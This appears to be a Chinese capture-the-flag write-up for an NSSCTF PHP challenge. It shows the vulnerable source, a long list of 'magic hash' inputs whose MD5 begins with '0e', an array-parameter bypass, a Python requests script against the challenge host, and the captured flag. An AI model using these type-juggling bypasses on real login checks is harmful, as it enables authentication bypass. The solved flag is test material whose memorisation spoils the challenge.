0×01 打开题目环境
内容如下
<?php
highlight_file(FILE);
include 'flag2.php';
if (isset($_GET['name']) && isset($_POST['password'])){
$name = $_GET['name'];
$password = $_POST['password'];
if ($name != $password && md5($name) == md5($password)){
echo $flag;
}
else {
echo "wrong!";
}
}
else {
echo 'wrong!';
}
?>
wrong!
其中重要代码是
if ($name != $password && md5($name) == md5($password)){
echo $flag;
}
&&左右两个条件都满足,意思是name的值不等于password,但是,md5值中让name的值和password的值相等,即可输出flag
0×02 进行解题 拿flag
使用0e开头的数字传递参数,PHP会将0e开头的数字转化为0,使MD5的值相等,但是变量的值不相等
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
240610708
0e462097431906509019562988736854
314282422
0e数字参考连接:https://www.bbsmax.com/A/kmzLxxDYzG/ (使用s开头!)例如
name=s878926199a
password=s155964671a
传参
flag=NSSCTF{b778dd89-aaac-4941-ad61-5a7c973938e5}使用数组进行绕过,因为MD5不能加密数组,所以MD5的值都没NULL,满足了两变量MD5的值相同
name[]=n
password[]=n
其中'n'为任意数字,都可以
传参
flag=NSSCTF{b778dd89-aaac-4941-ad61-5a7c973938e5}通过python脚本
import requests网站的URL
url = "http://node2.anna.nssctf.cn:28014/"
用get方法传递的name参数
name = "s878926199a"
用post方法传递的password参数
password = "s155964671a"
两个参数的md5值均以0e开头且后面的字符均为纯数字
发送post和get请求,并获取响应对象
response = requests.post(url, data={"password": password}, params={"name": name})
打印响应的文本内容
print(response.text)
其中3方法可以结合1和2
输出的response.text即为flag
运行
flag=NSSCTF{b778dd89-aaac-4941-ad61-5a7c973938e5}
